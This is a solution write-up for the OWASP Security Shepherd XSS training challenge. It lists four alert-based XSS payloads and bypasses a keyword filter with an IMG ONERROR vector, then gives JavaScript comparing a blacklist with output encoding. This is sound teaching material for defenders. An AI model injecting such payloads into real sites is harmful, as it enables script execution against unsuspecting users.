OWASP Security Shepherd Project - Cross Site Scripting 1 (XSS Challenge)
Challenge
Solution
Let's try the attack vectors provided by the XSS lesson and use Burp Suite to see what is filtered!
The attack vectors:
<SCRIPT>alert('XSS')</SCRIPT>
<IMG SRC="#" ONERROR="alert('XSS')"/>
<INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Submitting <SCRIPT>alert('XSS')</SCRIPT> shows that the "i" in "script" is replaced with ".".
Fortunately, we have attack vectors that don't use <script>. Let's try <IMG SRC="#" ONERROR="alert('XSS')"/>.
Quite easily we complete the challenge!
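Why the filter fails and what fixes it, as an added example that is not Security Shepherd's own code: `blacklistFilter` is a hypothetical reconstruction inferred only from the behaviour observed above ("script" becomes "scr.pt"), and `encodeHtml` is the output-encoding alternative for an HTML body context. It runs both over the four lesson vectors.

```javascript
// Hypothetical reconstruction of the challenge filter (an assumption, not the
// project's code): replace the "i" of every "script", preserving case.
function blacklistFilter(input) {
  return input.replace(/script/gi, (m) => m.slice(0, 3) + "." + m.slice(4));
}

// Output encoding for an HTML body context: every markup-significant
// character becomes an entity, so nothing the user sent can open a tag.
function encodeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// The four vectors listed in the lesson above.
const vectors = [
  "<SCRIPT>alert('XSS')</SCRIPT>",
  "<IMG SRC=\"#\" ONERROR=\"alert('XSS')\"/>",
  "<INPUT TYPE=\"BUTTON\" ONCLICK=\"alert('XSS')\"/>",
  "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
];

// For each vector: does the blacklist leave it byte-for-byte intact,
// and what does the encoder emit instead?
function compare() {
  return vectors.map((v) => ({
    input: v,
    passesBlacklist: blacklistFilter(v) === v,
    encoded: encodeHtml(v),
  }));
}

for (const row of compare()) {
  console.log(row.passesBlacklist ? "UNFILTERED" : "altered   ", row.input);
  console.log("  encoded ->", row.encoded);
}
```

A keyword blacklist only touches inputs that contain the keyword, so the event-handler vectors reach the page unchanged; encoding at output time does not depend on guessing which tags or attributes are dangerous.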